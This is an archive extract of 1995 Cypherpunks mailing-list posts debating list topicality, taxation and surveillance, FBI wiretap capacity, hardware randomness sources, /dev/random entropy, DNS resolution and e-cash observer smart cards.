this list is.  It is not "getting cryptographic systems written, deployed,
and popularized."  It's about getting people to learn how to protect their
privacy and to see that their self-interest is served by having privacy. 

That's much more than "writing code".  If you have an insecure machine, a 
machine on which I can monitor your keystrokes as you enter your pass 
phrase, what good is strong crypto??

Somewhere between diddly and squat?

>>    Since when did Cypherpunks become the mailing list fit for Perry?
>
>Look, its simple. If you want the FBI and NSA to win, post lots of
>crap here. Nothing will help them out more than clogging one of the
>few communications channels available to people interested in
>spreading cryptography. If you are really successful, all the smart
>people will leave (as has happened in waves before -- the losses of
>Steve Bellovin and (effectively) Phil Karn are still felt) and you
>will have totally destroyed the channel.

What would Perry have us do??  What does he want??  Does he want all of us
to order radiation detectors to beef up our random number generators?? 

Talk about a red herring!!

How about this instead Perry?  How about if you suggest that everyone make
sure that every Network which a machine connects to, and every other
trusted Network has removed the username/password combinations,
"tech/support", "LAN/admin", and "guest/user". 

This is easy to do, and is a solid recommendation. Unless the almighty
"Perry" would rather that you NOT worry about simple security matters
which protect privacy and are within anyone's control. 

>> we must also take the time and trouble to occasionally tell Perry to
>> shove his opinions up his ass.
>
>If you want the anti-crypto people to win, nothing can help nearly so
>much as your attitude. I'm glad to see what side you are on.

There's lots of things I could think of doing to Perry's ass, and shoving 
his opinions is but one of them.

It was hard enough for me as a Canadian to watch 3 out of 5 Francophones
vote to separate from Canada and form their own nation. And to then watch
as two leaders from within English Canada -- Preston Manning who runs the
Reform Party, and Ralph Klein, who is Premier of Alberta -- breach
protocol and insult the peoples of Quebec by discussing, commenting and
gloating over the overall election results even before concession speeches
by Bouchard and Parizeau.

And I groaned later when Parizeau said that the overall vote squeaker was
a result of "money and the ethnic vote."  Touche. 

But this is nothing in comparison to listening to some jackass talk out 
of both sides of his mouth, while he deliberately attempts to steer 
people away from what the MAJORITY of posters to this list have a strong 
common conviction about.  Securing their systems and their personal privacy.

It might be a rag tag bunch with differing political ideologies, but one 
idea brings all of us together here.

Except for one ... jackass.

And yep, I'm back after a brief silence.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 4 Nov 1995 01:18:18 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <199511030524.VAA03406@ix5.ix.netcom.com>
Message-ID: <9511031621.AA11770@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>>Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
>>by people as well as EARNED by people.  Most payers have easily 
>>detectible physical presence and assets that can easily be attached by 
>>regulators.   It will be a cold day before, e.g., my employer agrees not 
>>to report my earnings.  And the same is true for most employers in most 
>>industries.  

>Unfortunately, this is true, at least for people whose employers are
>subject to income tax somewhere.  Taxing businesses doesn't make sense
>economically - you could collect almost as much money with far less disruption
>to the underlying economy by taxing it as wages for workers and

Why unfortunately? I happen to consider that our modern social ecconomy
is a high point of civilisation. It is certainly a tremendous achievement.
We can educate the entire population, provide them with health care,
prevent famine and provide protection against crime and agression by
other states. All in all rather a good deal.

While one might wish to personally avoid paying taxes there are no benefits if 
everyone avoids paying taxes. There are significant areas of the ecconomy
which can only be funded through social mandates, roads for example.
While there are fringe political elements who put forward alternative models
I find them no more convincing than the claims of the Marxists who made
similarly ideologically based assertions not so long ago. There have at 
least been examples of Marxist states, even though they were not particularly
successful and rapidly degenerated into dictatorships.


I find the libertopian obsession with government oppression and complete
indifference towards coporate exploitation unsatisfactory. The truth is
that both are inevitablty interlinked. For the "libertarian" it is 
unsatisfactory for the government to exploit consumers of utilities but
entirely satisfactory for corporations to do so should they have the chance.
The theoretical possiblity of competition making this acceptable even
where there is no actual competition and hence no choice. This 
corprativist model accepts supression of freedom provided it is to
commercial goals.

Consider the linkage between direct mail advertising and surveilance. It
is unecconomic for a government to trace the movements of every citizen.
The communist countries were brought down as much by the cost of the huge
surveilace administrations they constructed as anything else. In the
West we do not have government surveilance, we have direct mail marketers
do the job for government. Surveilance is made ecconomic by getting the
citizen to subsidise it. It is naturally open for the government to apply
information collected by these people for their own purposes. It is a 
salable commodity and the government is a willing buyer. Furthermore there
is a sophisticated infrastructure in place to achieve these ends.

The extent of corporate surveillance goes unnoticed by most citizens. Few
people realise that when they use their credit card in a supermarket they
are supplying a direct mail marketing company with a profile of their
spending paterns. They are also providing a statement of where they are,
and indirectly their income, residence etc.

What is needed is stringent data protection laws which enforce the 
confidentiality of personal information. Note that both the SEPP and
STT payments systems conceal the credit card number from the merchant.
Cryptographic locks on individual parts of the picture are insufficient 
however. What is needed is laws which make the financing of the 
underlying architecture unecconomic.

		Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 4 Nov 1995 05:43:58 +0800
To: hallam@w3.org
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <9511021709.AA03831@zorch.w3.org>
Message-ID: <199511031743.MAA09044@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


hallam@w3.org writes:
>It is a fair point that just because technology has changed the 
>nature of the game it should not mean that wiretaps cease to be 
>possible.

No it isn't.  If someone builds a "cone of silence", traditional audio
surveillance becomes impossible.  Why should wiretaps be any
different?  Strong crypto is the "cone of silence" for digital
transmission.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Fri, 3 Nov 1995 12:13:39 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <Pine.ULT.3.91.951102013958.18049A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.LNX.3.91.951103114116.20782B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 2 Nov 1995, Rich Graves wrote:

> > 
> >    In Hong Kong, the Internet wasn't quite strangled, but the British
> > authorities who control that colony managed to throttle free electronic
> > speech with the rest of the world until everything was bottlenecked into
> > a few little-known satellite links.
> 
> Hmm, few specifics here. I wonder if they would care to elaborate. Nah.

Don't waste your time with that idiot, he doesn't know what he's talking
about. The 1-week partial black-out here in Hong Kong happened because some
providers had ignored some licencing requirements, and has been quickly
solved once they agreed to comply.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: usura@berserk.com (Alex de Joode)
Date: Fri, 3 Nov 1995 19:32:08 +0800
To: cypherpunks@toad.com
Subject: Re: Radiation Detectors from Aware Electronics
Message-ID: <g4NZDD1w165w@asylum.berserk.com>
MIME-Version: 1.0
Content-Type: text/plain


sharborth@hai-net.com writes in an followup to perry@piermont.com:
....
:: There have been several requests for information on the company that 
:: makes the radiation detectors with RS232 interfaces that I mentioned.
[..]
:: Perry
: 
:      So what does this have to do with this mailing list??
:      Skip

The cypherpunks mailing list has a lot to do with cryptography,
an important element of cryptography is randomness one way that
seems to be a superior source for obtaining random data is 
radioactive decay, radiation detectors wich have an RS232 interface 
can be hooked up to an computer and thus act as a source of randomness.

    -AJ-
--
kill -9 hkk@netcom.com .. process killed .. lawyer terminated successfully




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 12:13:04 +0800
To: hallam@w3.org
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <9511031621.AA11770@zorch.w3.org>
Message-ID: <199511031659.LAA08943@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I strongly disagree with Mr. Hallam, but I am replying in private
mail. This is far off the topic of the list.

hallam@w3.org writes:
> 
> >>Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
> >>by people as well as EARNED by people.  Most payers have easily 
> >>detectible physical presence and assets that can easily be attached by 
> >>regulators.   It will be a cold day before, e.g., my employer agrees not 
> >>to report my earnings.  And the same is true for most employers in most 
> >>industries.  
> 
> >Unfortunately, this is true, at least for people whose employers are
> >subject to income tax somewhere.  Taxing businesses doesn't make sense
> >economically - you could collect almost as much money with far less disrupti
on
> >to the underlying economy by taxing it as wages for workers and
> 
> Why unfortunately? I happen to consider that our modern social ecconomy
> is a high point of civilisation. It is certainly a tremendous achievement.
> We can educate the entire population, provide them with health care,
> prevent famine and provide protection against crime and agression by
> other states. All in all rather a good deal.
> 
> While one might wish to personally avoid paying taxes there are no benefits i
f 
> everyone avoids paying taxes. There are significant areas of the ecconomy
> which can only be funded through social mandates, roads for example.
> While there are fringe political elements who put forward alternative models
> I find them no more convincing than the claims of the Marxists who made
> similarly ideologically based assertions not so long ago. There have at 
> least been examples of Marxist states, even though they were not particularly
> successful and rapidly degenerated into dictatorships.
> 
> 
> I find the libertopian obsession with government oppression and complete
> indifference towards coporate exploitation unsatisfactory. The truth is
> that both are inevitablty interlinked. For the "libertarian" it is 
> unsatisfactory for the government to exploit consumers of utilities but
> entirely satisfactory for corporations to do so should they have the chance.
> The theoretical possiblity of competition making this acceptable even
> where there is no actual competition and hence no choice. This 
> corprativist model accepts supression of freedom provided it is to
> commercial goals.
> 
> Consider the linkage between direct mail advertising and surveilance. It
> is unecconomic for a government to trace the movements of every citizen.
> The communist countries were brought down as much by the cost of the huge
> surveilace administrations they constructed as anything else. In the
> West we do not have government surveilance, we have direct mail marketers
> do the job for government. Surveilance is made ecconomic by getting the
> citizen to subsidise it. It is naturally open for the government to apply
> information collected by these people for their own purposes. It is a 
> salable commodity and the government is a willing buyer. Furthermore there
> is a sophisticated infrastructure in place to achieve these ends.
> 
> The extent of corporate surveillance goes unnoticed by most citizens. Few
> people realise that when they use their credit card in a supermarket they
> are supplying a direct mail marketing company with a profile of their
> spending paterns. They are also providing a statement of where they are,
> and indirectly their income, residence etc.
> 
> What is needed is stringent data protection laws which enforce the 
> confidentiality of personal information. Note that both the SEPP and
> STT payments systems conceal the credit card number from the merchant.
> Cryptographic locks on individual parts of the picture are insufficient 
> however. What is needed is laws which make the financing of the 
> underlying architecture unecconomic.
> 
> 		Phill
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 4 Nov 1995 12:12:48 +0800
To: tomw@cthulhu.engr.sgi.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199511021747.JAA08919@orac.engr.sgi.com>
Message-ID: <199511031805.NAA09698@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Tom Weinstein writes:
>In article <DHEtE6.FB6@sgi.sgi.com>, Mark Murray <mark@grondar.za> writes:
>> I chatted with a colleague at work, and he helped bend my mind right.
>> I had the mistaken notion that adding lots of data would "overflow"
>> and "dilute" the entropy to an attackable state.
>
>I think the problem is not merely flooding the device with non-random
>input data.  If you coordinate sucking out entropy with feeding in
>non-random data you can suck the real entropy in the system down to zero
>while making the driver think it has plenty of randomness.  While it's
>not clear to me how this would lead to an attack, it would be worrisome.

You need a similar "mind bending".  "Feeding in non-random data"
doesn't lead to the driver thinking it has "plenty of randomness" left,
since it doesn't increase the entropy level to counteract the decrease
from the entropy-sucker.

The hard part would be having the driver figure out how much entropy
it's getting from the input.  "Non-random" implies some sort of
correlation between the bits.  I can't think of any way of measuring
that which doesn't make some sort of "horizon" that a malicious user
can confuse.

The simple mechanism would be to assume that input from untrusted users
adds no entropy, forcing entropy estimates to represent a lower bound.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 5 Nov 1995 01:02:05 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: video as a source of public randomness
In-Reply-To: <acbf861a06021004706b@[205.199.118.202]>
Message-ID: <199511031708.MAA08978@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> I  don't plan to belabor this point. Radioactive decay sources are
> certainly fine, though not likely to be purchased by most people.

Video digitzation equipment connected to TV tuners turned to dead air,
your suggestion, are equally unlikely to be purchased by most
people. The geiger counters are very simple and cheap, too.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 04:49:03 +0800
To: cypherpunks@toad.com
Subject: Many Topics are Appropriate for Discussion Here
Message-ID: <acbf9ee00b0210044261@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:38 PM 11/3/95, Perry E. Metzger wrote:

>Look, its simple. If you want the FBI and NSA to win, post lots of
>crap here. Nothing will help them out more than clogging one of the
>few communications channels available to people interested in
>spreading cryptography. If you are really successful, all the smart
>people will leave (as has happened in waves before -- the losses of
>Steve Bellovin and (effectively) Phil Karn are still felt) and you
>will have totally destroyed the channel.

There have been many posts which are more "clogging" than some minor
conspiracy rants. And if people don't want to respond to these rants,
they'll decline. Far more serious, in my opinion of course, are the
cross-posts to multiple mailing lists and the various press releases and
position papers bombarding us.

Implying that the reason Bellovin and Karn left the list--if they did, as I
haven't checked--was because of "off-topic" posts seems to be a stretch.
Even if Perry has gotten assurances from them personally that the
"off-topic" posts were a major factor, I'm not sure much can be concluded
from this. People leave for all sorts of reasons. I don't know what
reasons, if any, were responsible for the unsubscribings (or at least
nonpostings) of Bellovin or Karn, but I'm not too sure it matters.

I don't think it is useful to speculate on the causes for specific people
leaving the list, or even to ask them why they left. If they feel it is
important for us to know that they left the list because of too much talk
about UFOs, or about IETF committees, or about Netscape breakages, they can
tell us in their departing message.

Certainly using the departure of J. Random Subscriber, or even R. Noted
Hacker, as "proof" that topics are inappropriate is flawed logic. "We've
lost fine subscribers like Phil Zimmermann because of crap posted here." I
suspect there's some fancy Latin name for this kind of appeal to authority.

Topics have always been in flux, which is almost certainly a good thing,
else a lot of us would have left a long time ago. Certainly those
interested in some topics have little if any interest in other topics.

Lots of other people have joined the list, and the subscription base has
done from an earlier plateau of about 700 subscribers to more than 1200
recently. And many of the current subscribers are very active in
cryptography and security. I'd be tempted to mention a half dozen or so
names, but anyone I left out might feel slighted.

I do agree with Perry that longish political essays are probably not the
_best_ material for this list, though thoughtful essays on the implications
of digital cash, such as several folks have written about, are always
useful. And there are many troubling aspects of "crypto anarchy" that need
more explication, something I always feel is approprate for this list.

I am much less bothered by _custom written_ essays by current subscribers,
whatever the topic, than by reposts of long articles from other lists.
Thus, occasional rants from list members are preferable, to me, to longish
essays from outsiders, generally speaking.

Political aspects of strong cryptography have always been important to this
list. Though new subscribers may be forgiven for thinking this is the
"Netscape bug list," such has not always been the case. Key escrow was a
dominant topic in the early days, as it is today. And there are massive
numbers of issues to be discussed in the digital money area, involving
banking laws, the role of intelligence agencies in desiring to monitor cash
flows, the legal implications of anonymous cash, and scads of technical
issues.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 5 Nov 1995 01:02:25 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Physician, Heal Thyself
In-Reply-To: <acbf8c7e08021004f0bb@[205.199.118.202]>
Message-ID: <199511031738.MAA00170@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> >Tim May will doubtless disagree, but he has nothing else to do in life
>                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >than read the net so his incentives to see traffic minimized aren't
> >the same as other people's.
> 
> Perry, would you please knock off the drone of snide remarks about
> me?

It wasn't a snide remark. I believe that the fact that you are retired
and spend a considerable fraction of your day reading news and mail
alters your perspective about what is reasonable.

BTW, I thought I was in your kill file.

> You are often quick to say "What has this got to do with Cypherpunks?," but
> you yourself are perfectly willing to rant on about Nietzsche, the East
> Germans, and Louis Freeh. Physician, heal thyself.

You frequently say this sort of thing, but its groundless. My
Nietzsche comment was a sarcastic side remark and not a discussion of
Nietzsche -- I refused, in fact, to discuss him. Mentions about the
FBI's new telephony tapping requirements are on topic provided they
aren't excessive, as are comments on a wide variety of cryptography
and security related topics.

What I object to is noise. Postings about Waco, IBM microkernel
operating systems, INSLAW, and libertarianism aren't on topic. A
message noting that there is a hearing in the Bernstein trial (as with
John Gilmore), brief notices about the availabilty of online articles
on topics of interest (as with John Young), etc, are all perfectly in
order. Its when people start posting garbage that has nothing to do
with local discussion (such as whether socialism is good) that I get
mad. I think that this is not a difficult line to understand.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 4 Nov 1995 12:03:34 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Kallstrom Calls All Calls Tappable
In-Reply-To: <199511031441.JAA18237@pipe2.nyc.pipeline.com>
Message-ID: <199511031743.MAA12656@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


James Kallstrom (FBI-NY) in The Washington Post:
>    "We've never done that many" taps at one time, he said. But
>    in a "worst-case scenario," such as a major act of
>    terrorism, the agency might need such ability, he said. "I
>    think it's a reasonable, minimal, conservative number."

In other words, they'll "round up the usual suspects" ?  Mr. Sose
to a White Courtesy Telephone, please.

The argument above is very different (and IMHO much less defensible for the
FBI) than the claim that the LEAs will in general have more investigations in
progress that require wiretapping. A gradual increase in wiretap orders in
a given area could plausibly happen as more and more interesting traffic
goes over the wire. But a sudden jump in activity after a crime has been
committed looks like a big fishing expedition. In particular, I fear that
judges will be more disposed to sign stacks of wiretap orders 
indiscriminately in the aftermath of a major act of violence.

-Futplex <futplex@pseudonym.com>

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 4 Nov 1995 10:53:01 +0800
To: cypherpunks@toad.com
Subject: consumer products that make nice sources
Message-ID: <Pine.SOL.3.91.951103124506.27341A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 3 Nov 1995 10:34:00 -0500 (EST)
>From: Brad Dolan <bdolan@use.usit.net>
>To: s1113645@tesla.cc.uottawa.ca
>Cc: "Perry E. Metzger" <perry@piermont.com>, cypherpunks@toad.com
>Subject: Re: Sources of randomness 
>
>
>> What prices have you got listed? Is the equipment sensitive enough to get 
>> lots of entropy from a normal environment or do you need artificial sources
>> of radioactivity? (easy, safe and cheap enough to get?)


The tag on my Montana Sunshine Radon Mine radon pillow is a little blurred.  
I think the following is the right phone number.

Sunshine Mine is an amusing concept.  People pay money to go breathe radon
there, while others are spending much money avoiding radon.

Anyway, the pillows make nice sources and good conversation pieces.

bd


>Safe, easy-to-obtain gamma sources:  orange fiesta-ware pottery (at flea 
>markets), old-style Coleman lantern mantles (not sure about the new 
>ones), uranium-ore "health pillows" (Sunshine Mine, 408-225-3670).
                                                     ^^^
                                                     406







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 12:09:50 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: video as a source of public randomness
In-Reply-To: <acbf9287090210045bcb@[205.199.118.202]>
Message-ID: <199511031747.MAA00192@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



[I understand that this isn't your suggestion...]

Timothy C. May writes:
> I was commenting on the sources of randomness, such as atmospheric RF
> variations, antenna configuration, tuner sensitivity, amplifier noise,
> etc., that would make prediction of snow bits very difficult.

I feel leery about these things if only because, as I've noted, trying
to get these things "just right" and make sure that you are getting
noise and not, say, high frequency hum from your own switching power
supply, is very hard. You can set up a geiger counter if you are
merely moderately competant. I don't know who I would trust to do
analog stuff "just right". Do things a little wrong, and you merely
have a huge search space and not an impossibly huge one -- the sort of
toehold cryptanalysts want.

> I have no brief with any of the proposed schemes: nearly any are better
> than what we have now, if widely deployed and suitable used.

Agreed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sat, 4 Nov 1995 05:17:23 +0800
To: perry@piermont.com
Subject: Re: video as a source of public randomness
Message-ID: <v02130503acc01193c4a4@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:08 PM 11/3/95, Perry E. Metzger wrote:

>Timothy C. May writes:
>> I  don't plan to belabor this point. Radioactive decay sources are
>> certainly fine, though not likely to be purchased by most people.
>
>Video digitzation equipment connected to TV tuners turned to dead air,
>your suggestion, are equally unlikely to be purchased by most
>people. The geiger counters are very simple and cheap, too.
>
>Perry

Well, it's true that video digitization equiptment _used_ to be unlikely to
be purchased.
Now, it is often standard equiptment. I recently purchased a Mac Performa
for a Customer
Support desk. We chose a cheaper model that came with a built-in video
tuner. It came
with a _remote control_ that would allow you to switch channels and adjust
the volume
just like a regular remote. It was very nicely integrated and ready to suck
down signal
from an antenna.

While I haven't hacked that part of the Mac kernal, I would not be
surprised if it was easy
to turn the signal into a Quicktime video file ready for hashing.

This was, incidentally, one of the cheaper Performas available at the time.
Your mileage
may vary because Apple is really flipping all over the place on features.
But, now that the cold
war is over, I don't expect them to be offering the Radiation Manager
plug-in any time soon.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Noah Brodbeck <nbrodbeck@hollandhart.com>
Date: Sun, 5 Nov 1995 12:41:27 +0800
To: cypherpunks@toad.com
Subject: Telephone switch capacity
Message-ID: <s09a2bef.049@allegro.net>
MIME-Version: 1.0
Content-Type: text/plain


	Please be aware that the current capacity of the
telephone system in the United States (and for that matter,
most of the developed world) is only capable of supporting
between 15 and 20 percent simultaneous telephone
conversations.  If the FBI wishes to set up a system that is
capable of monitoring 1% of the total number of lines, that
equates to a ability to tap 5%, not 1% of all calls in progress.

>As the FBI's "interest" shifts from area to area, the whole
>country could rapidly come under the 1% surveillance
>directive.
>1.5 million telephone intercepts.  Or more.

								-=- Noah





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 4 Nov 1995 21:17:46 +0800
To: Sten Drescher <dreschs@mpd.tandem.com>
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <199511032037.PAA13172@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Sten Drescher writes:
>sameer <sameer@c2.org> said:
>> 	The US govt. doesn't run the root nameservers, nor are all the
>> root nameservers within US jurisdiction.
>
>	Granted, the US Govt doesn't run the US-based root servers.
>But, if an Internet 'Decency' law was passed, they certainly could try
>to threaten the US-based root server maintainers to make the cascading
>threats.  And, as I understand the way DNS resolution works, address
>requests go down to your root domain then up from the other root domain,
>i.e., for me to find out what c2.org's address is, my system requests
>from:
>NS mpd.tandem.com
>NS tandem.com
>NS com
>NS org
>
>If this is correct, if the com NS has the entry for the org NS, I won't
>be able to resolve those names.  Of course, explicit IP addresses and
>/etc/hosts entries would still work.

It isn't correct.  First, your host is immediately looking for a
namserver for c2.org, by querying it's configured default server (say,
piaget.mpd.tandem.com) for it.  If the server already has the answer
cached, it's returned immediately.  If not, a bit in the query tells it
whether the client wants it to find the answer or return an "I don't
know" answer -- most want it to find an answer.

Piaget.mpd.tandem.com probably already knows enough to bypass queries
to the tandem.com and com domains, since it's probably already resolved
at least one org query.  It can then go directly to a server for org to
get the c2.org information the client requested.

The other confused point you have is that there isn't just *one* server
for org.  There are at least a dozen interchangeable root nameservers
which handle all of com, org, edu, net, mil, gov, and the country
domains (us, uk, de, etc).

It's been a matter of policy for quite some time now that to register a
sub-domain under one of the top level domains (i.e., to register c2.org
under org) you must demonstrate two accessible nameservers for the new
domain.  I note, for example, that mpd.tandem.com has *four*
nameservers.

To eliminate "tandem.com" from the DNS, all of the dozen or more root
nameservers, which are in different jurisdictions, must be
compromised.  Even then, sub-domains of the top level generally offer
very long expiration periods for cached data.  It could be years before
the data left the cache from some of the second level servers, assuming
they stayed up that long.

It would almost certainly be long enough to get a judge to slap an
injunction against the action.

Once again, the net interprets censorship as damage and routes around it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 04:47:54 +0800
To: cypherpunks@toad.com
Subject: Re: Webernet Madne$$
In-Reply-To: <199511031826.TAA29048@utopia.hacktic.nl>
Message-ID: <199511031940.OAA00303@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This is an example of what I've been talking about. This really isn't
a cypherpunks topic. I spent lots of time reading that article trying
to find references to cryptography, security, payment systems, or
anything else, and it contained none of them. Why post this here and
waste our time?

.pm

Anonymous writes:
> Wall Street Journal, November 3, 1995
> 
> 
> Wall Street is in the throes of Internet mania. Or is it
> Internet madness?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 04:35:49 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <acbf9ee00b0210044261@[205.199.118.202]>
Message-ID: <199511031947.OAA00318@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Implying that the reason Bellovin and Karn left the list--if they did, as I
> haven't checked--was because of "off-topic" posts seems to be a stretch.

They both left because the noise level was too high and the
cryptography content too low. I'll ask Steve to comment if you insist.

> Certainly using the departure of J. Random Subscriber, or even R. Noted
> Hacker, as "proof" that topics are inappropriate is flawed logic. "We've
> lost fine subscribers like Phil Zimmermann because of crap posted here." I
> suspect there's some fancy Latin name for this kind of appeal to authority.

The point of this list is to provide the community of people who are
interested in cryptography and its application to further personal
freedom to congregate and exchange information. If important members
of that community -- people with important input to give -- cease to
be here because of the noise level, then we most certainly are not
meeting our goal. Its not a question of appeal to authority, except
that we want this list to appeal (in the other sense) to authorities
in this field.

> Lots of other people have joined the list, and the subscription base has
> done from an earlier plateau of about 700 subscribers to more than 1200
> recently.

I don't care about quantity. Steve Bellovin is worth 500 subscribers
-- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
lot of this stuff than most of what passes for careful thought from
the average person here.

> Political aspects of strong cryptography have always been important to this
> list. Though new subscribers may be forgiven for thinking this is the
> "Netscape bug list," such has not always been the case. Key escrow was a
> dominant topic in the early days, as it is today.

Key Escrow is a fine topic of conversation. My problem is when someone
posts a long and totally irrelevant article about the value of
internet stocks to the list, as just happened.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 4 Nov 1995 21:16:47 +0800
To: lvhove&amp;vnet3.vub.ac.be@vnet3.vub.ac.be (Leo Van Hove)
Subject: Re: Info needed on observers
In-Reply-To: <v01530501acbea2598fe2@[134.184.16.171]>
Message-ID: <199511032049.PAA13455@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Leo Van Hove writes:
>I am currently preparing a paper on payment systems for the Internet
>and related issues.  I recently found out that so-called observers could
>be placed on smart cards (in order to prevent double spending, or even to
>prevent people from cheating on taxes...).
>
>To be honest that's about all I know about observers and I am very eager
>to find out more.  I am, however, having a hard time finding interesting
>references on this subject.
>
>Hence, all suggestions to get me started would be extremely welcome.
>Questions of particular interest are: possible functions (and limits),
>how 'real' are they already?, what about privacy?, ...

With ecash it's possible to duplicate a coin and spend it twice ---
it's not really any different than copying a file and printing each
copy, after all.  In most ecash schemes, the double-spender can be
detected and identified when the coins are deposited, but this could be
long enough for him to disappear, leaving the bank or the payee holding
the bag.

An "observer" is designed to create a prior restraint to
double-spending.  The observer is a tamper-resistant smart card that
must be involved in all coin transfers.  When the coin is withdrawn
from the bank, the observer's signature is needed to validate it.  When
the coin is spent, the *same* observer's signature is again needed to
validate it.  The observer won't sign the same coin twice during the
spend protocol.

To double-spend with an observer present, you'd need to bypass the
tamper resistance.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 4 Nov 1995 06:27:04 +0800
To: Noah Brodbeck <nbrodbeck@hollandhart.com>
Subject: Telephone switch capacity
In-Reply-To: <s09a2bef.049@allegro.net>
Message-ID: <9511032051.AA14124@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Noah Brodbeck writes:
 > 	Please be aware that the current capacity of the
 > telephone system in the United States (and for that matter,
 > most of the developed world) is only capable of supporting
 > between 15 and 20 percent simultaneous telephone
 > conversations.  If the FBI wishes to set up a system that is
 > capable of monitoring 1% of the total number of lines, that
 > equates to a ability to tap 5%, not 1% of all calls in progress.
 > 

According to an article that was out on the AP newswire (check under
<URL:http://http://www1.trib.com/WIRE/CURRENT/>), the "1%" figure
applies to actual capacity.  In other words, if there's a switch with
50K subscribers but actual capacity for 5K simultaneous calls, the FBI
wants to be able to make 50 simultaneous taps.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
